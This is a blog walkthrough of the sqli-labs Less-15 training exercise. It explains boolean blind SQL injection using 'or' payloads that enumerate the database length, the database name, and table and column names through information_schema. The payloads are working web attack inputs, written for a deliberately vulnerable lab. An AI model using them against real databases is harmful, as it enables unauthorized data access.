当前位置:网站首页>About sqli lab less-15 using or instead of and parsing

About sqli lab less-15 using or instead of and parsing

2022-07-07 12:23:00 hcjtn

Follow the old train of thought , Try the means of reporting errors , It is found that no error statement is output , View source code , It is found that there is no output statement ( So consider using blind injection )

( With 15 For example )

  • Determine the database length :’or (length(database()))=8-- q

  • Judge the database name :'or (ascii(substr(database(),1,1)))=115-- q

  • The name of the judgment table :'or (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q

  • Determine the name of the column :'or (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q

We found that in the previous eight and nine levels, we used and; And by the 15 Turn off , We use or , Let's look at the following two levels of source code ( Take questions 9 and 15 as examples )

 Insert picture description here

[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-hpzsEuec-1639194328367)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20211211113557894.png)]

Now let's put these two statements together :

 Insert picture description here

It's not hard to see. , If we were 15 Question use and Then it will become :

 Insert picture description here

Obviously not , Because we don't know username Value . If you use or, Then the following values are established as a whole .

And in the 9 In question id=1 Is established, so it can be used and As a connection of statements .

原网站

版权声明
本文为[hcjtn]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202130618271890.html

随机推荐